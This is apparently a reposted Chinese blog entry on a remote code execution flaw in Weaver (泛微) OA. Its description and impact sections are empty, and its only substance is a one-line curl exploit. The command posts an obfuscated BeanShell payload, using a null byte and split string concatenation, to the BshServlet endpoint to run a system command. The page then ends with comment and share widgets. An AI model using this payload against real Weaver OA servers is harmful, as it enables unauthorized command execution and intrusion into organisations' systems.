泛微OA管理系统RCE漏洞

# 泛微OA管理系统RCE漏洞

> 原文:[https://www.zhihuifly.com/t/topic/3330](https://www.zhihuifly.com/t/topic/3330)

# 泛微OA 管理系统RCE漏洞

## 一、漏洞简介

## 二、漏洞影响

## 三、复现过程

“`
curl http://0-sec.org:8000/weaver/bsh.servlet.BshServlet -d ‘bsh.script=eval%00(“ex”%2b”ec(\”whoami\”)”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw’
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容